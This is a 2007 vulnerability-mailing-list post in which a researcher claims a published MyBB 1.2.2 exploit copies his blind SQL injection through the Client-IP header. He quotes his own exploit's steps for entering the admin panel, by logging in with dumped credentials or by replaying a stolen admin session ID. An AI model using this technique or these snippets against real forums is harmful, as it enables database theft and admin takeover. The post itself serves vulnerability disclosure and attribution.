[VIM] Milw0rm 3719 (Mybb <= 1.2.2)
GM darkfig
gmdarkfig at gmail.com
Thu Apr 12 17:25:16 UTC 2007
The guy use the same vulnerability I found
(http://acid-root.new.fr/poc/28070403.txt).
He use the same method (benchmark(), Client-IP, DELETE from
prefix_sessions WHERE ip='[SQL]', and a debug mod like me :) ). It's
just the perl version. He use the solution number 1 I said in my
exploit:
# SOLUTION NUMBER 1
# mysql> select * from mybb_users\G
# *************************** 1. row ***************************
# uid: 1
# username: root
# password: 39ac8681f5cf4fcd9c9c09719a618bd3
# salt: BFeJBOCF
# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...
#
# $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration
Control Panel...
#
# SOLUTION NUMBER 2
# mysql> select * from mybb_adminsessions\G
# *************************** 1. row ***************************
# sid: 81e267263b9254f3aaf670383bfbfec9
# uid: 1
# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
# ip: 127.0.0.1
# dateline: 1175443967
# lastactive: 1175444369
#
# $xpl->addheader('Client-IP','127.0.0.1');
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration
Control Panel...
#
# I decided to use the solution number 2.
More information about the VIM
mailing list